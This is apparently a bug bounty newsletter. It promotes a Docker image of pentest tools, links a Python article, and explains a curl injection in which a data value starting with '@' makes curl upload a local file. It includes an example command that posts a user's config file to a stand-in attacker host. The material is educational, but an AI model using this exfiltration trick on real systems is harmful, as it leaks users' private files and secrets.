A Pentest Box and the 35 words to Python

Hi,

You are receiving this email because you subscribed to Sim4n6’s newsletter. A monthly newsletter dedicated to bug bounty hunting, Linux 🐧, Python, and much more.

@Sim4n6

A Pentest Box container 📦️ 

A docker image made to encapsulate the most commonly used CLI tools for bug bounty hunting. Because why pollute the main host when you can have them all in a separate container? 🔗 https://github.com/Sim4n6/APentestBox

You can simply use the command to fall immediately within the container shell:

sudo docker run -it --name apb sim4n6/apentestbox:latest

Learning Python Corner 🐍 

Are you aware that to grasp the basics of Python, you need to understand 35 unique words only 🔗 The 35 words You need to Python

The vulnerability is sometimes so subtle

Say you can control the sink in --data-binary $'foo=bar' in the following curl POST request:

curl -i -s -k 
    -X $'POST' \ 
    -H $'Host: portswigger.net' \ 
    -H $'Content-Type: application/x-www-form-urlencoded' \
    -H $'Content-Length: 7' \ 
    --data-binary $'foo=bar' \ 
    $'https://portswigger.net/'

You just have identified a local-file disclosure vulnerability. How? 

According to curl documentation, the previous command would post the data exactly as specified with no extra processing whatsoever. But if you start the data foo=bar with the letter “@”, the rest should be a filename, like:

 curl --data-binary @/home/user/.config https://evil.com

So rather than POSTing data foo=bar, you end up sending a file located by @/home/user/.config.

That was the Paul Mutton private report to the PortSwigger Web Security bug bounty program. The details of the write-up are here.

The end